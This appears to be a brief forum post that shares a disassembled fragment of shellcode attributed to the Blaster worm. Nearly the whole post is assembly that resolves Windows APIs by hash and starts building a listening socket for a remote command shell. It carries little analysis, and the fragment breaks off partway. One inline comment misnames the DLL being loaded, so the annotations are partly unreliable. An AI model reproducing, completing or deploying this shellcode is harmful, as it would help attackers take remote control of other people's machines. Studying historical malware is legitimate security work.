here is a snippet of the worms exploit code:
<Snippet>
loc_4AF: ; CODE XREF: seg000:000004A8j

sub esp, 34h

mov esi, esp

call GetKernel32BaseAddy

mov [esi], eax ; EAX is the base address of kernel32.dll

push dword ptr [esi]

push 0EC0E4E8Eh ; corresponds to LoadLibraryA

call ScanForAPI

mov [esi+8], eax

push dword ptr [esi]

push 0CE05D9ADh ; WaitForSingleObject

call ScanForAPI

mov [esi+0Ch], eax

push 6C6Ch

push 642E3233h

push 5F327377h ; ws32_2.dll

push esp

call dword ptr [esi+8]

mov [esi+4], eax ; esi + 4 = HModule of ws32_2.dll

push dword ptr [esi]

push 16B3FE72h ; CreateProcessA

call ScanForAPI

mov [esi+10h], eax

push dword ptr [esi]

push 73E2D87Eh ; ExitProcess

call ScanForAPI

mov [esi+14h], eax

push dword ptr [esi+4]

push 3BFCEDCBh ; WSAStartup

call ScanForAPI

mov [esi+18h], eax

push dword ptr [esi+4]

push 0ADF509D9h ; WSASocketA

call ScanForAPI

mov [esi+1Ch], eax

push dword ptr [esi+4]

push 0C7701AA4h ; bind

call ScanForAPI

mov [esi+20h], eax

push dword ptr [esi+4]

push 0E92EADA4h ; listen

call ScanForAPI

mov [esi+24h], eax

push dword ptr [esi+4]

push 498649E5h ; accept

call ScanForAPI

mov [esi+28h], eax

push dword ptr [esi+4]

push 79C679E7h ; closesocket

call ScanForAPI

mov [esi+2Ch], eax

xor edi, edi

sub esp, 190h

push esp

push 101h

call dword ptr [esi+18h] ; WSAStartup returns 0 if successful

push eax

push eax

push eax

push eax

inc eax

push eax

inc eax

push eax ; call wsasocketa
</snippet>

This is just a little bit of the blaster worm, the rest of the code I am not allowed to reveal.